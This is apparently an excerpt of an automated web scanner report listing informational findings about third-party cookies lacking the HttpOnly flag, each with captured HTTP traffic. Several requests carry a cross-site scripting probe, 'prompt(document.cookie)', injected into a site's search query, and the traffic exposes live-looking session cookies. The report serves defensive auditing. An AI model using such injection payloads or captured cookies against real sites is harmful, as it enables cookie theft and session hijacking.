GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^26; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69240; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3142787.js^3^1315313158^1315313159&3142736.js^5^1315313158^1315313158&3147282.js^2^1315313158^1315313158&3218923.js^1^1315313158^1315313158&638178.js^5^1315313158^1315313157&3172565.js^2^1315313158^1315313158; expires=Tue, 13-Sep-2011 12:45:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1945

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142787"
...[SNIP]...

10.85. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

10.86. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF0BHwHRB4EACa0QvYgQDRyEAQA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:20 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Tue, 06 Sep 2011 13:05:20 GMT
Content-Length: 39
Date: Tue, 06 Sep 2011 12:55:20 GMT
Server: QS

qc_results({"segments":[{"id":"D"}]});

10.87. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=2025226563;fpan=1;fpa=P0-1156348243-1315331724508;ns=0;url=http%3A%2F%2Fwww.myfitv.com%2Fsearch%3Futf8%3D%25E2%259C%2593%26query%3Dxss%25003d6ce%2527%253prompt(document.cookie)%2F%2F9336b0fa1c5;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315331724504;tzo=300;a=p-7elq8ZYievA_s;labels=myfitv HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EE4BHwHSB4EQCa0QvYgQDRyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:24 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Server: QS


10.88. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.766755.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

10.89. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.790042.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

10.90. http://redirect.rtrk.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

10.91. http://sales.liveperson.net/hc/21807557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagUrl&lpCallId=407482566544-792098556877&protV=20&lpjson=1&SV%21impression-query-name=chat-scottrade-english-header&SV%21impression-query-room=chat-scottrade-english-header&id=8862763361&info=button-impression%3Achat-scottrade-english-header%28Online%20Trading%20%26%20Investing%20%u2013%20Stock%20Trading%20Tools%2C%20Platforms%20%26%20More%20%7C%20Scottrade%29&waitForVisitor=true&d=1315331337781&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:59 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Set-Cookie: LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 12:48:59 GMT; path=/hc/21807557; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"407482566544-792098556877","lpCallConfirm":"","lpData":[{"result":40}]}});

10.92. http://sales.liveperson.net/hc/21807557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagKnockPage&lpCallId=899421501671-998744760406&protV=20&lpjson=1&id=9931965344&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-scottrade-english-header%7ClpMTagConfig.db1%7ClpButton-header%7C%23chat-scottrade-english-footer%7ClpMTagConfig.db1%7ClpButton-footer%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861; ASPSESSIONIDQATBDRTA=MLFCOIPBEDHBOHEOHFPGIFDG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315313361328; expires=Wed, 07-Sep-2011 12:49:21 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:49:21 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29844

lpConnLib.Process({"ResultSet": {"lpCallId":"899421501671-998744760406","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.93. http://sales.liveperson.net/hc/21807557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagKnockPage&lpCallId=137591478182-9251743555&protV=20&lpjson=1&id=8862763361&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-scottrade-english-header%7ClpMTagConfig.db1%7ClpButton-header%7C%23chat-scottrade-english-footer%7ClpMTagConfig.db1%7ClpButton-footer%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=4698670149782373135; path=/hc/21807557
Set-Cookie: HumanClickACTIVE=1315313336397; expires=Wed, 07-Sep-2011 12:48:56 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29842

lpConnLib.Process({"ResultSet": {"lpCallId":"137591478182-9251743555","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.net
...[SNIP]...

10.94. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

10.95. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
